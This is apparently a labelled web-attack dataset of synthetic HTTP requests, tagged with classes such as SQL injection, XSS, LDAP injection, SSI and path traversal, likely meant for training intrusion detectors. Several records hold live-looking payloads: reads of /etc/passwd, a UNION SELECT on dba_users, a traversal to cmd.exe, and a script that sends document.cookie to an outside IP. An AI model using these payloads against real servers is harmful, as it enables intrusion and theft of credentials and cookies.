GET /.-1systemkMqK11aD/vASlVV4rj1SwJ/asasxoismkba/6execsEFJhdF/c8all/Mhou7gcedgse/cb/xDqNxRG@.html?outt9dnm=wd%3Brrmi&gEhz=olikeTc7&Met=%29%28++%7C+%28displayName%3Dhad*%29++++%28name%3D+had*+%29%28mail%3Dhad*+++%29&tl=bitoer-+autoexechn%3Dah&Utobject50d_=236490&nf8neeo=dropIr&uQWNadocumenthttp=+mnnwtii3n0dt%3A+lu HTTP/1.1
Host: www.ldHrer5rE.org:61
Connection: xlreee1
Accept: audio/*;q=0.5, text/*
Accept-Charset: euc-kr, isiri-3342, windows-1258
Accept-Encoding: 
Accept-Language: y-sstd, yybi-dsnlvsmy;q=0.1
Cache-Control: max-age=98
Client-ip: 176.132.89.96
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Wed, 15 Apr 09 09:49:37 GMT
ETag: W/"Zl1tLfUymxvB3V8"
Expect: 100-continue
From: hen1pimh@E3rhrtw1.uk
If-Modified-Since: Sat, 13 Nov 04 14:54:41 GMT
If-Unmodified-Since: Fri, 18 Sep 09 22:34:41 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 May 04 10:38:07 UTC
Max-Forwards: 14
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: Digest username="e7ozca"
Range: 2-,-247703
Referer: /hptbsrbi/ctq6tnnZ.tar
TE: deflate
Trailer: Date
User-Agent: Mozilla/1.9 (compatible; Konqueror/8.3; Windows NT; cksad4tk; teoAsmReF)
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: HTTP/6.7 176.17.248.123, 9.3 www.vbhw.jpeg, 4.4 www.dnsR3he.js
Transfer-Encoding: gzip
Upgrade: rsS/8.2, 0dcoT/9.2, sO3bf/3.2, o6e/7.5
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38988
Start - Id: 39156
class: SSI
GET /eZomn/tIxa6SKq.v/hssiablntrcwa/tvcWXcE@Y_CI_XoOzc_z/wae9ausdne/yZ/t@gN4JPogf.jpg?wv31ePhHyZ=52114&betaionoie=4280522&eala=n9dwsiag&nie=47919&NVlocationXwindow.openZRHEbetween=Piuo&lyteoOfoanvee=h%40vo%3BE%5Dwinntnph-%26&ssnatt=37&ylnrhpc=8664&nsacEeeV=suoeeearZirtslEnw3&khrdkedtaIoeOne=elhtpassbqztiradocumentebadt&re7si=i%2Fhttp&1e4haces=rrfc HTTP/1.0
Host: 77.121.35.169:552
Connection: close
Accept: image/jpeg;q=0.0, application/*, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ntnoo-eokfiNl7, qan6-wT4l
Cache-Control: max-age=48579
Client-ip: 211.72.120.217
Cookie: aOlieU4ppeaz2=<!--#echo var="date_gmt"-->
Cookie2: $Version="68"
Date: Wed, 12 Nov 08 09:25:32 UTC
ETag: W/"ZHnd7fqGl_H.gppZJp"
Expect: e1Iuu=eig4;hohanmft=oEeaA6s7
From: ectdj@6rt19rcai.com
If-Modified-Since: Mon, 30 Nov 09 18:12:12 CET
If-Unmodified-Since: Thu, 30 Oct 08 17:51:36 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Nov 04 23:56:56 GMT
Max-Forwards: 24
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="7nsypmlL"
Authorization: Basic bmhJY2g0cmE6U3NhcmZhdGU=
Range: -6701
Referer: http://www.o8ljhn.gov/adeSt14.cfm
TE: chunked
Trailer: Connection
User-Agent: kdetI (eVcbPkvopT; cZc2wd52n; sAUasP)
UA-CPU: StrongARM
UA-Disp: 9926,2237,8
UA-OS: Solaris
UA-Pixels: 308x434
Via: 8.0 www.zsSqO.gif:582
Transfer-Encoding: gzip
Upgrade: sNrPh/3.1, DArw/8.8, seEv0h/6.6
Warning: 430 218.56.203.53 "ebsaieatngcc1Ede" 
X-Forwarded-For: 3.217.212.81
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39156
Start - Id: 38608
class: LdapInjection
GET /lO6dmailP.Wc6h/qJUp6zrrcpc/XsQ/maR@sreplaceFoZAnocetcW/ytni0/iUr6fpxpY.SX4/qZ2r7-id2QLminsert/akm0W6RjiNsYiU1b7D/mdxOaF/eYLN61VlVZj6-6iLO/nSbuk/i_n3WZQtmA0pO6.asp?6xfiSc=50%29%28%26%28objectClass%3Dhsd0%29%28%7C%28sn++++%3D+++ho%29%28cn%3Dhn++++J*%29%29 HTTP/1.0
Host: www.ssso.de:04646
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=2349
Client-ip: 26.215.206.53
Cookie: st=9218;qiyjdai5tz=ee37ikfnluiee
Cookie2: $Version="8"
Date: Tue, 16 May 06 11:45:36 CET
ETag: W/"-Yp1G8Ccnlj056rU8yTq"
Expect: yEraech
From: RwOaaelp@gdhst.com
If-Modified-Since: Fri, 01 Aug 08 13:11:41 GMT
If-Unmodified-Since: Sun, 10 Apr 05 16:00:28 UTC
If-Match: *
If-None-Match: "2IpU2wVio5qrZodNUR"
If-Range: Sun, 20 May 07 05:12:59 UTC
Max-Forwards: 51
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: Digest uri=http://www.tmai.org/4iripx/reahe/2Cse.php4
Range: -348176
Referer: http://www.ruMmo.it/kiajf/aot5i/8bswq/dseoeh.php4
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 7.2; mL-60; rv:0.9.3) Gecko/34793498
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2570x635
Via: 4.4 www.heaD.tiff, FTP/2.0 www.OtTn.gif
Transfer-Encoding: deflate
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 156 www.amoaxg.gif "c0dtoegins4aneef" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38608
Start - Id: 35934
class: PathTransversal
GET /QQ.replaceq3bS63oa/aNwmXnE/e@m.Y/eidiylegaltiohc1ht/eUpCw5e7Z1O6m6cV/JaoEEdroEs/tx2N/icV7CTOtEf/t3S/tWqOBOrsystemghttpgroup by1f/sHi/epagrietsIbc09natah.tiff?94lrsnxur9be=tjD1dvVKos14&kjny=ea&gK4Q._=Y6hlaeitstylerwn&dhnsvheelnuh=fm&hdardr=19526&7hejolyhnt=awt5nbe51ewDepuaor&avlMiants=enbgsoundT&rOlyato=i3xsepe-fn&tTnodpso=mItHvID7_&eias=cetlh44rel&AXIOCI_K5=1&oL=k9aae&en3T=4EDdqQm.d06q&cisujrn=ntj4inne&5dropUcXA=%3C%21--+++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E HTTP/1.0
Host: 63.254.86.245:80
Connection: keep-alive
Accept: image/*
Accept-Charset: ks_c_5601-1987, x-mac-chinesetrad, iso-8859-1;q=0.5
Accept-Encoding: 
Accept-Language: saaqes8-s, otr88n-sn9alca, 4oonen7d-a4t;q=0.2, petna-eaNyte1A
Cache-Control: only-if-cached
Client-ip: 111.208.189.237
Cookie: osEypsd=ttbr e s8s;itrot=lvar=rcornehtpass betweentmetar4I;kvnph-xhtacces0=sgncdh;deoagpt=36;yUVPB=54650086;slnjnf=8usrlinkd+:o
Date: Thu, 25 Oct 07 13:23:42 UTC
ETag: W/"GNtszPWW4.S97fblBw"
From: guNijtrt@taipn3.org
If-Modified-Since: Tue, 07 Aug 07 02:16:57 CET
If-Unmodified-Since: Wed, 10 May 06 21:02:53 UTC
If-Match: "q.F@FoqzdyxTHycF"
If-None-Match: "BuzDP88tDg6pyUzZC7"
If-Range: "2_bDP_Zjp8O3kZBJj"
Max-Forwards: 72
MIME-Version: 6.6
Pragma: N='cn'
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Digest response="286B3b4eABfad87Ccb98fB0a08cbaC4c"
Range: -7654,73-181
Referer: http://pedteiws.biz/sueor/rduee.ace
TE: chunked;q=0.3
User-Agent: Mozilla/4.2 (compatible; Konqueror/5.5; Open BSD i586; anwoaag)
UA-Disp: 684,759,32
UA-Pixels: 769x5162
Via: HTTP/8.3 www.13pn.css, 4.0 www.zane.tiff, 5.8 www.t9rd1.tiff:1
Transfer-Encoding: seotjt; Te3jt=csu8y
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35934
Start - Id: 45928
class: PathTransversal
GET /pKd2N/egp.G_dCVrFAdx8/arXoJAgWh.X3TiIfdi/taj25T1E9ajbR.f7RBU/pcdjR0/bnLoop-8_7/ooearwfqa/oYGVbfEgdhPJ9Hy_.php4?luu5tgp6=i3re%3Djf&bOaccess_logrU=eo&d3e=alohnfromscripteeult&sseusmtlo=l&roeu=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&datm7h7lT=4297622&vefp=u%3D&qsnc=aDedau&t5t=iycWB&doskft1=lhto&becy8nosonE=cmrs9pWlhwP&hspacetrnAyc=iixr&alret=en0doAraLhtsdivf&pgrticl5lt=%5Bhttpse7i0exmlxtru HTTP/1.0
Host: 201.157.111.179
Connection: reoiB
Accept: */*
Accept-Charset: koi8-r, x-mac-arabic;q=0.5, iso-8859-7, big5
Accept-Encoding: 
Accept-Language: sas5ti4-oaait5, uav-eis, 6nlneee-o6a;q=0.2, s4dase-ottldl
Cache-Control: max-stale=32117
Client-ip: 114.234.233.242
Cookie: 2cgn2n=gEcbe0ezttyh;taSvnDrfolSle=9sehC;Iuo=t;an7rns7natA=<;DnB0=t.IwnD8
Cookie2: $Version="3"
Date: Mon, 24 Jan 05 12:32:32 GMT
ETag: "1MT.AVtNT_x-4Gm"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Sun, 09 May 04 12:02:03 CET
If-Unmodified-Since: Mon, 30 Aug 04 02:45:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5145
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest username="ousdpba"
Authorization: Digest username="qeeAe0NT"
Range: -542428,64054-7678
Referer: /Noce/boru/msEGtnoN/nhtamdst/okroeoon.swf
TE: deflate;q=0.6,trailers
Trailer: Upgrade
User-Agent: ztull (rL2eCW; oVu40Z9kIa)
UA-CPU: Sparc
UA-Disp: 1794,840,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 880x5284
Via: 2.9 www.tscgi.jpg
Transfer-Encoding: identity
Upgrade: dhvol/0.8, Pde/4.9
Warning: 025 97.241.122.220:45 "riSehsrtuatehr" 
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 7013359045213548457
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45928
Start - Id: 41896
class: SqlInjection
GET /el4ubRC/xiN0oEHuFX22.mdb?aIr1etdco=83875857&oastet2hgdey=3uEhJxQ1&0tthnI=6I%27++UNION++%2F**%2F+++SELECT++fadeObInha++FROM+++++dba_users++++WHERE+++++4t++++like+++%27%2525&osclcloisqhnehE=cncecotsaapiaAetx&ldxeSiubhil=Juo%3As&-A8Mjdivrd=M8ocat7havingqnwinnt+A%3Fxr4en&ekw9ne1=nsOJoMsi HTTP/1.1
Host: www.gtfne4.cz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 199.227.44.84
Cookie: 0lpizparenst=PlW;seumdh7n6YETyxt=dsel;unlpuTddeyYp=592656429
Cookie2: $Version="698"
Date: Sat, 05 Dec 09 16:17:18 CET
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: 7Adh@rholi48i.be
If-Modified-Since: Sun, 05 Mar 06 17:18:13 CET
If-Unmodified-Since: Wed, 04 Jul 07 19:15:59 GMT
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: *
If-Range: Fri, 03 Aug 07 05:27:36 GMT
Max-Forwards: 546
MIME-Version: 7.9
Pragma: ir6n=enfy
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Basic aXJvdjpwZGJvdGhM
Range: 7-,552794-,881563-
Referer: http://www.a4eewu.be/earaslcl/hq24uz.css
TE: gzip,deflate;q=0.9,chunked;q=0.8
Trailer: TE
User-Agent: eCJkyHHQ1_ http://www.yayrflsp.fr
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: 5.0 www.n2w6.htm:668, FTP/3.3 www.t2eoot.gif:971
Transfer-Encoding: deflate
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 209 99.218.44.161 "n5shpLu8ptOeAstrt7u" "Mon, 11 Feb 08 12:06:51 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41896
Start - Id: 40462
class: SSI
GET /eOFqKdi5Dh/9Oj1cfE.Vl/hthl/EY6Hox.pl?etoed=%3C%21--+%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E HTTP/1.1
Host: www.texcomdw.com
Connection: close
Accept: text/plain, video/mpeg
Accept-Charset: x-mac-arabic, iso-8859-8-i, euc-kr
Accept-Encoding: *
Accept-Language: 2ath6ne5-aS, tidu-8, F2ees5-ltetcUoh, qhai3bre-h
Cache-Control: no-store
Client-ip: 166.89.179.136
Cookie: oe4=8eaQrthhuo;nbweeieAiahgNib=2rtnbnjcOnie;Zrdnleiwiech7ni=ns2
Cookie2: $Version="52"
Date: Fri, 01 Aug 08 08:46:30 CET
ETag: W/"CWkiioo0WdACHhp"
Expect: i9gds
From: npmo@pBctcq.com
If-Modified-Since: Mon, 07 Apr 08 19:17:43 CET
If-Unmodified-Since: Fri, 26 Jun 09 03:52:43 CET
If-Match: *
If-None-Match: "680U4PU2gnOPeuy"
If-Range: Sat, 09 May 09 04:24:11 GMT
Max-Forwards: 57
MIME-Version: 4.8
Pragma: y=2pFrMf
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest qop=cjcoOs
Range: 6740-758,0802-
Referer: /nemouti/5ireUz/oeei/ee0t.gif
TE: trailers,chunked;q=0.9
Trailer: Range
User-Agent: Mozilla/3.3 (compatible; Konqueror/4.8; Open BSD i386; apsttrt; nydw; 1rinE)
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 025x185
Via: FTP/9.7 65.39.60.98, 9.9 84.41.72.90, FTP/7.8 95.97.224.130
Transfer-Encoding: compress
Upgrade: ytiE/1.4
Warning: 466 70.136.39.206 "sssc" 
X-Forwarded-For: 197.226.53.190
X-Serial-Number: 98565372421828
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40462
Start - Id: 45507
class: PathTransversal
GET /ixoLstER.40CfiT/yFSgr_dpj3GZ7PDVL/nRuvnW_8.aspx?Ti=i+75b&rrpree5=n%3A%5Cautoexec.bat HTTP/1.1
Host: 204.61.86.242
Connection: close
Accept: */*
Accept-Charset: gb2312, iso-2022-jp, iso-8859-8
Accept-Encoding: 
Accept-Language: cErzatl-h;q=0.1, peeham-inrfn;q=0.5, 3Kisie-olmTu;q=0.3
Cache-Control: no-cache
Client-ip: 136.132.185.114
Cookie: 9nBr7y=ap tc;txte6otynfcfac=accept 0;ArW6Ekqeehraef=kutwwriijt2hP
Cookie2: $Version="087"
Date: Thu, 27 Jul 06 20:33:14 CET
ETag: W/"8s6NLnMvF3qQwwHgq_w"
Expect: 100-continue
From: tetsj@adnocr.uk
If-Modified-Since: Sun, 15 May 05 10:06:11 GMT
If-Unmodified-Since: Sat, 06 Mar 10 13:38:20 UTC
If-Match: "snS-qjYQJR-3WRd"
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 2.3
Pragma: 876e=jccio
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: NTLM UG1uZGE1c2tlcVRlbXNSbmhPaWVtb2lFc21lbWVpb2FLdGFkdHR0YW9w
Range: 354-,63882-
Referer: /ithssa/3eoss/ninyna/edhFGPtj/t5Mu.shtml
TE: deflate
Trailer: Referer
User-Agent: Mozilla/1.6 (X11; U; SunOS sun4u 8.5; ho-16; rv:9.2.7) Gecko/28619748
UA-CPU: Sparc
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2096x915
Via: 7.8 6.182.109.221
Transfer-Encoding: gzip
Upgrade: paa/8.6, yprO/1.1
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45507
Start - Id: 37493
class: LdapInjection
GET /cCF3vv.gif?IyC72=ne+c3re%2B&hwN=05&peosohxb=6026565&enfeiccehapbd3=services&Ecbnoi4rsnroodi=eotw&ONW.TrO9winntF15=s0N0UQu40of&childAtiframelikeYtmpB=486126&nhtnea5iov4bD=rvm8sF&nspijfae8=terieRdropnull1ar&POt4=688163&bnr=24320 HTTP/1.1
Host: 81.18.92.244
Connection: lxv12g
Accept: video/mpeg, image/*, image/jpeg
Accept-Charset: utf-8;q=0.3, iso-8859-4;q=0.2, iso-8859-1, x-mac-japanese
Accept-Encoding: compress;q=0.0, identity, identity;q=0.5, compress;q=0.0, identity
Accept-Language: *
Client-ip: 118.8.27.231
Cookie: ESmvvS2=")(targetfilter=(o=NetscapeRoot));aivadenre=lK6GS-YD
Date: Mon, 24 Nov 08 10:34:10 GMT
If-Modified-Since: Thu, 22 Jan 04 21:28:27 GMT
If-Unmodified-Since: Thu, 25 Jan 07 20:30:38 UTC
If-Range: Wed, 08 Aug 07 18:19:03 UTC
Max-Forwards: 5
MIME-Version: 4.5
Proxy-Authorization: tastT te7gttj=ethsB
Authorization: Basic YW5zYXRhYTpodWFzaWVv
Range: -333,1-,-875
Referer: /atlhsnhe/515x.php4
TE: gzip;q=0.5,gzip
User-Agent: iaro/0.8
Via: 4.7 41.28.58.168
Transfer-Encoding: identity
Warning: 154 149.87.187.67 "neinesly" 
X-Serial-Number: 5649136594252322056

null

End - Id: 37493
Start - Id: 47770
class: XSS
GET /td/ersahodgrln6hd/lzrmfXZzyJI_GS-iX4v/s6fe23EeyrpW/etorpbeu/ytpnatc6htt/doan2asinctraueaiO.asp?tawx9a2=op8bts%3Cammochar&daxduDrtnbat=096283&itf=1699&tsbpg6tdXIdC=h.03UrL8O&aaeeoeao=%3Cxml+++++id+++%3D++++%22+++++X%22%3E%3Ca+++%3E%3Cb++++%3E%26lt%3Bscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F163.162.35.155%2Fie.asp%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb+%3E%3C%2Fa++%3E%3C%2Fxml+%3E&aY2eg7hrh=iT&wi=6245505814&eeycdisi=kai&FL2IR6=oe&4QFQ=36&aenYnhenx=3253&deaauuaot=1183431 HTTP/1.1
Host: www.RrunE.gov
Connection: uihsh
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate;q=0.9, identity
Accept-Language: tuhh-rrso, ceniTnn-u;q=0.4
Cache-Control: max-age=89427
Client-ip: 91.90.227.252
Cookie: rhe7m=@rib;pleebsd=yZst;s9cem=iiecs4YNlabmtetnk;kmtnowiiaid4ae=iUte8ftptRseoobjectjxinetcat o>;laj0einhnhr=60480938;vbscriptmO0fwsrMOimg5=moi -access_log
Cookie2: $Version="49"
Date: Mon, 15 May 06 05:14:00 CET
ETag: "q@9vcjf95.j6GZXaYbP"
Expect: nhsE=jgeiwe
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Tue, 22 May 07 13:41:05 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 67
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: asgu eNir55I=ndip
Range: 0-6,74113-
Referer: http://tonr.gov/tTigReu/cailr/srm69g3D.zip
TE: chunked,deflate;q=0.4,deflate
Trailer: Date
User-Agent: Mozilla/2.3 (compatible; Konqueror/1.5; Win 9x; x8enaeurw; Cnsha; rsnin8deue)
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 7.2 207.14.74.135:97267, 9.7 www.2NslS.htm:551, 2.4 www.tatmu.tiff
Transfer-Encoding: identity
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47770
Start - Id: 46228
class: PathTransversal
GET /rI/gam6dggggsakon3/uhwY/i0MoFeG2sj3g52./h7jtits4eragfktsto/9nasieOltsocl/eugnDU4D3vT7x@/nlt8cuc88cLI/tEI/iRoW0.jsp?iOen9=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&umesuNb3ifsn=wSitrye2e6nh68nnea&Sd8A0a=436166&9d.XkBR=%3Bj HTTP/1.0
Host: 78.211.147.59
Connection: keep-alive
Accept: text/*;q=0.2, audio/*;q=0.0, image/*;q=0.1
Accept-Charset: x-mac-chinesesimp, utf-8, x-mac-icelandic;q=0.3, hz-gb-2312, iso-2022-kr
Accept-Encoding: gzip, deflate, deflate;q=0.8
Accept-Language: ehs8-m7, ATnas-gledn;q=0.6, baLekewn-54i;q=0.3, cNiB-ehAraJ
Cache-Control: no-cache
Client-ip: 213.219.44.194
Cookie: urotbmx=th~st;d3NHQ=5302077574;P5vjL=dnsyeaodd8=
Cookie2: $Version="374"
Date: Wed, 02 Jan 08 08:22:13 UTC
ETag: "yc9wTp277f0YoEdYK"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Fri, 06 May 05 15:30:20 CET
If-Unmodified-Since: Sat, 26 Nov 05 23:51:15 CET
If-Match: "YoXFiYUDbEk3So5"
If-None-Match: "sfVc1tpHw8kkgLGk"
If-Range: Thu, 18 Sep 08 18:57:52 UTC
Max-Forwards: 063
MIME-Version: 1.9
Pragma: tinn2l=e
Proxy-Authorization: sczoan Qaahstc=tldthrl
Authorization: mneamc omFunim=Dr3hhiu
Range: 3-320
Referer: /sei0jPo/kesaLtn2/EemsIbgl/veoeelS.txt
TE: chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: 6uaoel4hNd/5.5.4.1.4
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6581x3968
Via: 5.6 www.bnmsnhnr.html, 9.5 132.128.219.85:709, FTP/0.0 www.deorWbS.js
Transfer-Encoding: usorpa
Upgrade: Sdb/4.1
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46228
Start - Id: 43988
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 47.255.103.41
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 60.172.21.158
Cookie: lictMeO=ns 
Cookie2: $Version="19"
Date: Mon, 24 May 04 02:07:41 CET
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Fri, 21 Dec 07 21:37:06 GMT
If-Unmodified-Since: Sun, 11 Jan 09 20:34:08 CET
If-Match: "0HCku5I6FQGDVvH"
If-None-Match: "S7aGc5OXUPvl1LMd"
If-Range: "p3VoLrrCqi1JRIZdiV7G"
Max-Forwards: 37
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: NTLM YWlyY280MXRqaGd0dGVlc21pZnQ0bEFrb29mZVJnZFM2
Range: -2,795-,-91
Referer: /oereiuc.php3
TE: trailers
Trailer: Referer
User-Agent: Mozilla/9.3 (X11; U; Unix 9.9; rs-iw; rv:2.7.9) Gecko/13231431
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.5 68.98.66.251, 2.3 www.ouisohz3.jpg
Transfer-Encoding: identity
Upgrade: xg0/7.5, les/7.5, issPe/6.0, n7r/7.1, elo/4.2
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 1714241
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43988
Start - Id: 42254
class: SqlInjection
GET /ti.ZRB_j0og4J.ENa/em8tmia/TcS.BpsWXEw/Ta/litln9rxUyu4woeaggd7/X5AuKrSbgrgqFs_/xEHsBVKservicesTI0-cQ/t9phhWmYbCF6ve959g/i9F/iJ0VbqH/eta4snwa.jpg?T-JRCckhomePi=euoeLhyeAdTtoo%2Bnn%5C&Finih=hKTslc&y3=bil%5C9&nnSafori=tYkQm-u%40-HO7&olrmanht46=gFfIjJhRw&semz08=chairs%27++UN%2F**%2FION++SEL%2F**%2FECT+++7gorj++FROM++++dba_users++WHERE++e0++like+++++%27%2525&tsjbeh64enanm=ayrcoj&nnuq4rryi=eS%5C&wieorldee=m%3F&FR8n.cDtelnet=tDaiqlqsystem4eaeLu&c0leN7gpn=uhs HTTP/1.1
Host: www.tasrat5idf.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: EwC-zkrt;q=0.9, tsa-0;q=0.3
Cache-Control: only-if-cached
Client-ip: 164.216.181.230
Cookie: rapnngg=49487
Cookie2: $Version="55"
Date: Sat, 06 Aug 05 16:06:24 CET
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: Ngynaai@esersh.uk
If-Modified-Since: Mon, 01 Feb 10 06:09:19 GMT
If-Unmodified-Since: Thu, 29 Apr 10 23:36:51 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Jan 10 13:59:16 GMT
Max-Forwards: 8
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZGxyY2F3cml0dmFkeHhpZzN2YWlpb3hkM2JvcmR0aW5hcnU=
Range: 4539-14148,-19,934-
Referer: http://r6ihGih.cz/ollbt/rtw7/idsnj/njrNae.gif
TE: chunked
Trailer: Accept-Language
User-Agent: Twctnsls/5.8.2.8.2
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4325x083
Via: FTP/4.2 www.mh7Ikaii.html, 2.1 102.28.194.89, HTTP/9.0 166.196.13.111
Transfer-Encoding: gzip
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42254
Start - Id: 46277
class: PathTransversal
GET /plyc--jXY2Srxh9G975/aTJedo0mter/dmqtvlumnittr/4stzei/aN2tf5mWo7H/fbQqAWJ/8pXc0y6RghiST9v/4eb/satbedotv/eRADDRur/rd/readsIGorg8ztt3tWji.sh?QOMWEhavingZ=520260724&kOhIh=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&YWSK=eaa HTTP/1.1
Host: 242.91.50.11
Connection: tsce
Accept: image/png, audio/x-wav, image/png
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 131.126.28.0
Cookie: aa35awmAuf1hpsi=lTeiif6+e;ttirm=wbiuetlocationEtty ;yeeeao3tkhgio=g5qz;jsddctn=e%r5t%ciaE2fHt>ohu>u
Cookie2: $Version="92"
Date: Sat, 19 Jan 08 16:23:23 GMT
ETag: "qTKDkaKodzPSVS8-"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 05 Jul 08 07:19:50 GMT
